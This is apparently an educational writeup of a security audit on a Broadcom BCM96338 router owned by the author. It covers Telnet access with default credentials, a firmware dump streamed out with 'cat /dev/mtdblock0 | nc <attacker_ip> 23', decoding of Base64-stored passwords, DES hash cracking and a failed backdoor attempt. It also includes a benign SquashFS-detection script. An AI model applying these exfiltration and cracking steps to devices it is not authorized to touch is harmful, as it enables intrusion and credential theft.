This project documents the end-to-end reverse engineering process of a Broadcom BCM96338 based embedded device. The goal was to audit the device's security, understand its proprietary file system, and retrieve hidden credentials using both static and live analysis techniques.
⚠️ Disclaimer: This project is strictly for educational purposes and was performed on hardware I own. Sensitive details (MAC addresses, Public IPs) have been sanitized.
- Target: Pikatel / AirTies (Broadcom BCM96338 Chipset)
- OS: Embedded Linux (Kernel 2.6.8) with BusyBox v1.00
- Techniques: Network Reconnaissance, Firmware Exfiltration, Blind Stream, Hash Cracking.
- Tools: nmap, netcat, binwalk, dd, strings, John the Ripper.
I started by scanning the device to identify attack vectors. Nmap revealed that alongside the web interface (Port 80), the device had Telnet (Port 23) exposed, which is a critical security risk for legacy devices.
Figure 1: Service enumeration revealing open Telnet and FTP ports.
Using default credentials found in public documentation (admin:password), I gained shell access via Telnet. Once inside, I enumerated the system architecture to plan the firmware extraction.
- Architecture: MIPS (Big Endian)
- CPU: BCM6338 V1.0
- Constraints: Read-Only file system, limited RAM.
Figure 2: Gaining shell access via Telnet.
Figure 3: Verifying the Kernel version and CPU architecture.
Before attempting extraction, I checked the memory layout (/proc/mtd) to identify the correct flash storage block. I confirmed that mtd0 was the "Physically mapped flash" containing the complete firmware image.
Figure 4: Identifying mtd0 as the target flash storage block.
To analyze the firmware offline, I needed to dump the Flash memory (/dev/mtdblock0). However, the environment was extremely restricted. Standard tools like wget were broken or stripped down, making it impossible to download external tools to the router.
Figure 5: Attempting to fetch binaries failed due to the restricted environment.
Since I couldn't download files to the router, I decided to stream the data out using Netcat, which was luckily present in the firmware.
- Listener (Kali Linux): `nc -l -p 23 > firmware_dump.bin`
- Sender (Router): `cat /dev/mtdblock0 | nc <attacker_ip> 23`
Figure 6: Successfully dumping the 2.5MB firmware image over the TCP socket.
I attempted to extract the dumped firmware using binwalk and 7z. I successfully stripped the proprietary header using dd, but the SquashFS extraction failed.
Technical Root Cause: The router uses Big Endian MIPS architecture. Standard extraction tools on modern x86/x64 systems (Little Endian) cannot natively read the file system structure without cross-compilation or specialized tools (like sasquatch-mipseb).
Figure 7: The extraction failure that forced a switch to Live Analysis.
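Before retrying an extraction it is worth reading the SquashFS superblock directly to learn which byte order and version the dump uses, since that decides whether stock tools or a big-endian build is required. The following is an added example of mine, not code from the original writeup: it scans a raw flash dump for SquashFS superblocks and reports offset, endianness, version and (for 4.x) the compressor. The sample dump is constructed, and the two non-standard vendor signatures are an assumption noted in the code.

```python
import struct
import sys

# SquashFS magic 0x73717368 as the bytes appear on disk for each byte order:
# "hsqs" = little endian, "sqsh" = big endian (the MIPS-BE case on this router).
# "shsq"/"qshs" are non-standard signatures seen in some vendor-patched LZMA
# builds (assumption, based on common firmware-analysis signature lists).
MAGICS = {
    b"hsqs": ("little", "standard"),
    b"sqsh": ("big", "standard"),
    b"shsq": ("little", "non-standard"),
    b"qshs": ("big", "non-standard"),
}
# Compression ids stored in the SquashFS 4.x superblock.
COMPRESSORS = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}

def parse_superblock(data, off):
    """Decode the fields we need from a superblock at `off`, or None if implausible."""
    endian, flavour = MAGICS[data[off:off + 4]]
    fmt = "<" if endian == "little" else ">"
    # s_major / s_minor sit at offset 28 in v2, v3 and v4 superblocks.
    major, minor = struct.unpack(fmt + "HH", data[off + 28:off + 32])
    if not 1 <= major <= 4:
        return None          # random byte match, not a real superblock
    info = {"offset": off, "endian": endian, "signature": flavour,
            "version": f"{major}.{minor}", "compression": None}
    if major == 4:           # only v4 records the compressor in the header
        comp_id, = struct.unpack(fmt + "H", data[off + 20:off + 22])
        info["compression"] = COMPRESSORS.get(comp_id, f"unknown({comp_id})")
    return info

def find_squashfs(data):
    """Return every plausible SquashFS superblock in a raw flash dump, by offset."""
    hits = []
    for magic in MAGICS:
        start = 0
        while (off := data.find(magic, start)) != -1:
            if off + 32 <= len(data) and (info := parse_superblock(data, off)):
                hits.append(info)
            start = off + 1
    return sorted(hits, key=lambda h: h["offset"])

# Constructed sample: 256-byte vendor header, then a big-endian v3.0 superblock.
SAMPLE_DUMP = (b"\x00" * 256 + b"sqsh" + struct.pack(">I", 42)
               + b"\x00" * 20 + struct.pack(">HH", 3, 0) + b"\x00" * 64)

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for hit in find_squashfs(blob):
        print(hit)
```

A big-endian hit is the signal to reach for a cross-built unsquashfs or sasquatch-mipseb instead of the stock x86 tools; pass the dump path as the first argument to scan a real file.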
Since static extraction was blocked by architecture mismatch, I pivoted to Live Analysis. I navigated the file system through the Telnet shell and located the configuration backup file.
I discovered that sensitive credentials (ISP PPPoE password, Support credentials) were stored in an XML file, merely encoded with Base64 rather than being encrypted.
Figure 8: Locating the Base64 encoded passwords in the config file.
Decoded Credentials:
- cGFzc3dvcmQ= -> password (Admin)
- c3VwcG9ydA== -> support (Hidden Service Account)
Beyond the XML file, I extracted the system user hashes from /etc/passwd. Using John the Ripper, I identified the algorithm as traditional DES crypt(3) and successfully cracked the root-level hashes.
Figure 9: Cracking the system hashes in seconds due to weak algorithm usage.
Finally, I attempted to write a backdoor file to the system to test for persistence. The operation failed, confirming that the root file system is mounted as Read-Only (SquashFS). Persistence is only possible by rebuilding the entire firmware image and flashing it back to the MTD block.
Figure 10: Verifying the immutable nature of the firmware.
This project demonstrated the vulnerabilities present in legacy embedded devices:
- Weak Storage: Passwords stored in Base64 or weak DES hashes.
- Insecure Defaults: Telnet exposed by default.
- Architecture: While the Big Endian architecture prevented simple static analysis, it did not stop live data exfiltration.
Status: Device Rooted & Fully Analyzed. 🚀